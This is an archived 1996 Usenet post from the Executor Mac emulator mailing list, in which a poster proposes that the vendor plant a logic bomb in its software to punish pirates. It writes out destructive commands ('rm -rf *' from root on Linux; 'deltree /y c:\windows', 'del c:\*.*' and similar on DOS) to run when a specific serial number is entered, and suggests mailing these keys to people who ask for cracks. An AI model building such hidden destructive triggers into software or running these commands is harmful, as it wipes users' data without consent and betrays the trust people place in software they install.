home *** CD-ROM | disk | FTP | other *** search
/ Executor 2.0 / executorv2.0.iso / pc / dos / extra / docs / maillist / text / archive.96 / text7702.txt < prev    next >
Encoding:
Text File  |  1996-07-25  |  1.2 KB  |  41 lines

  1. Newsgroups: comp.emulators.mac.executor
  2. Subject: howto fix serial# idiots permanently
  3. Date: Sat, 29 Jun 1996 10:31:05 +1000
  4. Organization: University of Southern Queensland
  5. Lines: 25
  6. Message-ID: <Pine.HPP.3.91.960629102103.16244A-100000@helios.usq.edu.au>
  7. NNTP-Posting-Host: helios.usq.edu.au
  8. Mime-Version: 1.0
  9. Content-Type: TEXT/PLAIN; charset=US-ASCII
  10. To: executor@ardi.com
  11. X-MailNews-Gateway: From newsgroup comp.emulators.mac.executor
  12. Sender: owner-executor@ardi.com
  13. Precedence: bulk
  14.  
  15. Include some code in the unlockable versions that will
  16. 'do a little mischief'.  Something like 
  17.  
  18. cd /
  19. rm -rf * for linux and the following for the DOS version
  20.  
  21. cd\
  22. attrib -rhs c:\*.*
  23. deltree /y c:\windows
  24. deltree /y c:\dos
  25. deltree /y c:\executor
  26. del c:\*.*
  27.  
  28. Make this code execute when a specific serial# is entered.
  29. Then when some dweeb criminal posts a 'gimme keys please' message,
  30. just mail him the destructive keys and let Executor do the rest.
  31.  
  32. This idea really does
  33.  have some merit;)
  34.  
  35. Then mail them 30 minutes later with a message like, 
  36. "Please can someone send me $150 dollars, I can't wait until we shrink 
  37. wrap E2. Please, this lack of money is a real annoyance when I try to buy 
  38. stuff.  And oh yes... have a nice day:)"
  39.  
  40.  
  41.